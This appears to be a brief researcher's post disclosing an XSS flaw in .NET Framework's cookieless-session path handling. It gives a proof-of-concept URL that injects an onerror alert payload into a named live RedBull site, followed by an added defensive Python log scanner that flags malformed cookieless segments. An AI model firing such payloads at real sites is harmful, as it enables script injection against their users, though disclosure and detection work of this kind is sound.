.NET Framework Cookieless Feature XSS.

Multiple XSS at RedBull

If your application relies on cookieless sessions or might receive requests from mobile browsers that require cookieless sessions, using a tilde (“~”) in a path can result in inadvertently creating a new session and potentially losing session data.

<script src="/(A(ABCD))/Script.js"></script>
http://liveblogat.redbull.com/(A(%22onerror=%22alert%601%60%22))/AllEvents.aspx
POC OF XSS
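
A defensive check for the behaviour shown above, as an added example that is not part of the original post: it locates the parenthesised cookieless segment in a request path and flags any segment whose value falls outside an expected alphabet. The function names, the allowed alphabet and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# A path segment wrapped in parentheses, e.g. /(A(ABCD))/ as shown above.
COOKIELESS_SEGMENT = re.compile(r"/\(([^/]*)\)(?=/|$)")
# Assumption: a legitimate segment is one or more single-letter headers whose
# values use only letters, digits, '-' and '_', so percent-encoding, quotes,
# '=' or backticks inside it are anomalous.
WELL_FORMED = re.compile(r"(?:[A-Za-z]\([A-Za-z0-9_-]+\))+")

# Constructed sample requests ("METHOD target STATUS"); the third target is
# the path of the PoC URL quoted above.
SAMPLE_LOG = [
    "GET /AllEvents.aspx 200",
    "GET /(A(ABCD))/Script.js 200",
    "GET /(A(%22onerror=%22alert%601%60%22))/AllEvents.aspx 200",
]


def inspect_url(url):
    """Return None if there is no cookieless segment, else a finding dict."""
    path = urlsplit(url).path  # urlsplit keeps percent-encoding intact
    match = COOKIELESS_SEGMENT.search(path)
    if match is None:
        return None
    raw = match.group(1)
    return {
        "raw": raw,
        "decoded": unquote(raw),  # decoded form for analyst triage only
        "suspicious": WELL_FORMED.fullmatch(raw) is None,
    }


def scan(lines):
    """Return (line_number, decoded_segment) for each malformed segment."""
    findings = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 2:
            continue
        result = inspect_url(fields[1])
        if result and result["suspicious"]:
            findings.append((number, result["decoded"]))
    return findings


if __name__ == "__main__":
    for number, decoded in scan(SAMPLE_LOG):
        print(f"line {number}: malformed cookieless segment {decoded!r}")
```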


Offensive Cyber Security Researcher At Resecurity

Ahmed Elmalky
